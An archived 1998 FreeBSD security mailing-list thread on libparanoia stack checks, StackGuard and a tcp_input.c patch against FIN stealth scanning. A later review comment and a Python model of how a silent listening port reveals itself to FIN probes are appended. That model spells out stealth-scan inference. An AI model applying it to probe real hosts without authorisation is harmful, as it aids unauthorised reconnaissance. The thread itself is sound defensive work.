Subject: Re: The 99,999-bug question: Why can you execute from the stack?
Cc: Alexandre Snarskii , security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 17 Sep 1998 16:19:52 EDT." <9809171619.ZM23712@beatrice.rutgers.edu>
References: <9809171619.ZM23712@beatrice.rutgers.edu> <199807200102.SAA07953@bubba.whistle.com> <199807200148.TAA07794@harmony.village.org> <9807192209.ZM23527@beatrice.rutgers.edu> <19980720173800.17978@nevalink.ru>
Date: Thu, 17 Sep 1998 14:29:50 -0600
From: Warner Losh

In message <9809171619.ZM23712@beatrice.rutgers.edu> "Allen Smith" writes:
: Sorry about the delay on replying to this; I've been busy. While this
: is a nicer way to do this in many ways, I am concerned in whether the
: delay from calling the libparanoia checks is from the function call or
: from what the function does.
: If the latter, fine; if the former, the
: problem I was working on (avoiding the slowdown except when really
: needed) still exists. Any idea which is the case? (Of course, there's
: also the time taken in doing the issetugid and geteuid checks in
: either case, whether one has them in the individual functions or in
: stentry.c.) If need be, I'll try some profiling, but I'd prefer to
: avoid that if someone already knows the answer.

There is something called StackGuard that is available that does
something similar to all functions that libparanoia does for str*. It
places "canaries" in the stack frame and uses them to detect overflows.
They claim there is little or no measurable slowdown. I'm playing with
this in my spare time and will report back when I have something to say.

Warner

From owner-freebsd-security Fri Sep 18 09:26:40 1998

Message-ID: <19980918202308.39458@nevalink.ru>
Date: Fri, 18 Sep 1998 20:23:08 +0400
From: Alexandre Snarskii
To: Allen Smith , Alexandre Snarskii , Warner Losh
Cc: security@FreeBSD.ORG
Subject: Re: The 99,999-bug question: Why can you execute from the stack?
References: <199807200102.SAA07953@bubba.whistle.com> <199807200148.TAA07794@harmony.village.org> <9807192209.ZM23527@beatrice.rutgers.edu> <19980720173800.17978@nevalink.ru> <9809171619.ZM23712@beatrice.rutgers.edu>
In-Reply-To: <9809171619.ZM23712@beatrice.rutgers.edu>; from Allen Smith on Thu, Sep 17, 1998 at 04:19:52PM -0400

On Thu, Sep 17, 1998 at 04:19:52PM -0400, Allen Smith wrote:
> > > I'd suggest adding anything executing with an effective uid of root;
> > > keep in mind servers. I've actually worked on this with the
> > > libparanoia's libc substitution, at least with the non-assembler ones;
> > > I'll try to find the time to test soon whether this actually speeds
> > > things up.
> >
> > Better approach is (every suid/sgid program) or ( euid == 0 ).
> > Patch to libparanoia/stentry.c attached. ( You have no need to
> > patch any other file - all checks are in stentry.c, others is just
> > standard files from /usr/src/lib/libc, just calls to stentry.c functions
> > added ).
> > Patched libparanoia available at
> > ftp://ftp.lexa.ru/pub/domestic/snar/libparanoia.1.1.tgz

New versions are available at the same place. The library which checks
stack integrity only for the setugid/root-owned cases is now called
libaranoia.N.N-root.tgz, where N.N is a version. Note that these checks
are a little broken by design - there are some daemons (tftpd, for
example) running non-setuid and with euid!=0, so no checks of stack
integrity are done.

>
> Sorry about the delay on replying to this; I've been busy. While this
> is a nicer way to do this in many ways, I am concerned in whether the
> delay from calling the libparanoia checks is from the function call or
> from what the function does. If the latter, fine; if the former, the
> problem I was working on (avoiding the slowdown except when really
> needed) still exists.
> Any idea which is the case? (Of course, there's
  ^^^^^^^^^^^^^^^^^^^^^^^^^^

Second one.

> also the time taken in doing the issetugid and geteuid checks in
> either case, whether one has them in the individual functions or in

This check is done only once - at the first call to any 'insecure'
function. The result is stored in a global static variable and used in
later calls to avoid switching to kernel mode.

> stentry.c.) If need be, I'll try some profiling, but I'd prefer to
> avoid that if someone already knows the answer.

Paranoidal strcpy (on short strings) runs about six times slower than
standard. On longer strings (tested with 1K) there is almost no
difference. ( 1K strings with 'always check' policy by default and
'only root check' policy in preloaded libparanoia :

snar@horse:~/compile/p-checks>time ./a.out
        9.04 real         6.62 user         0.02 sys
snar@horse:~/compile/p-checks>export LD_PRELOAD=../libparanoia/libparanoia.so.1.2
snar@horse:~/compile/p-checks>time ./a.out
        8.80 real         6.46 user         0.00 sys

1 byte string with same policy:

snar@horse:~/compile/p-checks>time ./a.out
        0.46 real         0.42 user         0.00 sys
snar@horse:~/compile/p-checks>export LD_PRELOAD=../libparanoia/libparanoia.so.1.2
snar@horse:~/compile/p-checks>time ./a.out
        0.16 real         0.13 user         0.01 sys

--
Alexandre Snarskii
the source code is included

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 18 22:40:59 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA23309 for freebsd-security-outgoing; Fri, 18 Sep 1998 22:40:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA23288 for ; Fri, 18 Sep 1998 22:40:56 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au)
Message-Id: <199809190540.WAA23288@hub.freebsd.org>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id
AA131023619; Sat, 19 Sep 1998 15:40:19 +1000 From: Darren Reed Subject: stopping "nack" `stealth' scanning. To: bugtraq@netspace.org Date: Sat, 19 Sep 1998 15:40:19 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One of the other ways to stealth scan is observing which ports no reply is received for. This patch causes RST's to be generated when sending (for example) a FIN to a listening socket, the same as in all other occasions. Patch provided by mycroft. Darren *** tcp_input.c.orig Sat Sep 19 14:52:06 1998 --- tcp_input.c Sat Sep 19 14:24:22 1998 *************** *** 618,624 **** tiwin <<= tp->snd_scale; goto after_listen; } ! } } else { /* * Received a SYN. --- 618,625 ---- tiwin <<= tp->snd_scale; goto after_listen; } ! } else ! goto badsyn; } else { /* * Received a SYN. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
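Review bot: the new `else goto badsyn;` sends a RST for every segment that fails the inner condition, but neither that condition nor the `badsyn` label is visible in the hunk; please confirm that the condition still excludes RST-bearing segments (a LISTEN socket must keep silently dropping a RST rather than answering it with another RST) and that `badsyn` already exists in this tcp_input.c, since the patch does not add it. The change also covers every non-SYN segment, not only the FIN the description mentions, so a one-line comment at the `else` noting that non-SYN segments to a listening socket are now reset just like segments to a closed port would help the next reader.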
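As an added illustration (not part of Darren Reed's message or of mycroft's patch), the following Python models the reply a port gives to a probe with no established connection, before and after the change, and shows why silence from a listening socket let a FIN probe tell open ports from closed ones. The CLOSED and LISTEN rules follow RFC 793; the flag sets and port numbers are constructed for the example.

```python
"""Model of how a lone FIN probe distinguished LISTEN from CLOSED ports.

Constructed example: a decision table for the segment types a probe can
send to a port with no connection, before and after the tcp_input.c
change that makes a listening socket answer non-SYN segments with a RST.
"""
from enum import Enum


class Reply(Enum):
    SYN_ACK = "SYN-ACK"   # normal handshake response from a listener
    RST = "RST"
    NONE = "no reply"     # segment silently dropped


def closed_port_reply(flags: set[str]) -> Reply:
    """RFC 793 CLOSED: drop an incoming RST, answer anything else with RST."""
    return Reply.NONE if "RST" in flags else Reply.RST


def listen_port_reply(flags: set[str], patched: bool) -> Reply:
    """RFC 793 LISTEN: RST dropped, ACK answered with RST, SYN gets SYN-ACK.

    Anything else (e.g. a lone FIN) was silently dropped; with the patch
    it is answered with a RST, so the port looks exactly like a closed one.
    """
    if "RST" in flags:
        return Reply.NONE
    if "ACK" in flags:
        return Reply.RST
    if "SYN" in flags:
        return Reply.SYN_ACK
    return Reply.RST if patched else Reply.NONE


def fin_probe_leaks(patched: bool) -> bool:
    """True when a lone FIN gets different replies from open and closed
    ports, i.e. when the stack lets silence reveal which ports listen."""
    probe = {"FIN"}
    return listen_port_reply(probe, patched) != closed_port_reply(probe)


def ports_inferred_open(replies: dict[int, Reply]) -> set[int]:
    """What the probing side concludes from an unpatched stack: the ports
    that stayed silent are the listening ones."""
    return {port for port, reply in replies.items() if reply is Reply.NONE}


if __name__ == "__main__":
    for patched in (False, True):
        print("patched" if patched else "unpatched",
              "stack, FIN probe leaks open ports:", fin_probe_leaks(patched))
```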
